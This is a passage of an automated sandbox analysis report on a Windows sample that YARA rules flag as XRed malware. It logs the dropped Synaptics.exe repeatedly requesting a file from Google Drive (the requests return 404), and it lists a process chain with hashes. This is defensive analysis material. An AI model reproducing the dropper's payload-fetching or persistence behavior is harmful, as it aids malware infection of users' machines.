                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:15 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-87jo50peTD25xhb229eQAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            120192.168.2.950167216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:15 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5bB4cwJJfe-zqJSSDcZj7kt5LhGAehDGVkDYGqHRz9Y7n4H8zlRMcaPx1_YJedz7LKhfBUvpo
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-AW6cSHoVMoEIqGun_04Mow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 51 44 58 35 2d 32 2d 64 70 5f 46 6b 31 56 67 56 62 74 47 78 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="pQDX5-2-dp_Fk1VgVbtGxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            121192.168.2.950166172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:15 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:15 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:15 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XufJAAOzCh62lSk_XbowKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            122192.168.2.950172216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:29 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5tdblVPX4kA1Ls_N8du8MzppwbFX_erEd8RXdFo281VTW-KFBnjsidPMeNCysXn1OI
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:28 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-n865IQqdIM3DNS5Dsma64g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:29 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                            2025-01-02 19:30:29 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 78 51 49 70 4c 50 77 46 63 48 2d 58 56 6f 30 7a 42 4f 55 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="XxQIpLPwFcH-XVo0zBOUYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:29 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            123192.168.2.950173216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:28 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:28 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7xKUOk0nJXOphPRu7dzIBUJ-Q0a3Msq588wKhooxEGr57G068vetaXUp32qyyVRWMJDzCw9zw
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:28 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-ILNwGMRXRCHWf-1L2_WxlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:28 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:28 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 62 33 37 73 4e 49 57 34 34 48 30 64 4e 6c 33 6e 50 57 43 32 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="7b37sNIW44H0dNl3nPWC2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:28 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:14:29:26
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:6'490'624 bytes
                                                                                            MD5 hash:E819C37952E89FF0F473FA9B59CD771D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:14:29:27
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Users\user\Desktop\._cache_file.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\._cache_file.exe"
                                                                                            Imagebase:0x1000000
                                                                                            File size:5'718'872 bytes
                                                                                            MD5 hash:630D75210B325A280C3352F879297ED5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:14:29:28
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                            Imagebase:0x400000
                                                                                            File size:771'584 bytes
                                                                                            MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 92%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:14:29:28
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:c:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe
                                                                                            Imagebase:0x290000
                                                                                            File size:78'152 bytes
                                                                                            MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:14:29:29
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                            Imagebase:0x430000
                                                                                            File size:53'161'064 bytes
                                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:14:29:38
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:771'584 bytes
                                                                                            MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:14:29:47
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                                                                                            Imagebase:0x480000
                                                                                            File size:2'801'152 bytes
                                                                                            MD5 hash:61173FF6ABB1C40E3D3B580126FC5F66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:14:29:48
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\splwow64.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                                            Imagebase:0x7ff708e50000
                                                                                            File size:163'840 bytes
                                                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:14:30:00
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe" c:\36a8a8e2fed651ec27d1eed188bb35\1033\EULA.rtf /p
                                                                                            Imagebase:0x480000
                                                                                            File size:2'801'152 bytes
                                                                                            MD5 hash:61173FF6ABB1C40E3D3B580126FC5F66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:17
                                                                                            Start time:14:30:15
                                                                                            Start date:02/01/2025
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
                                                                                            Imagebase:0xfa0000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

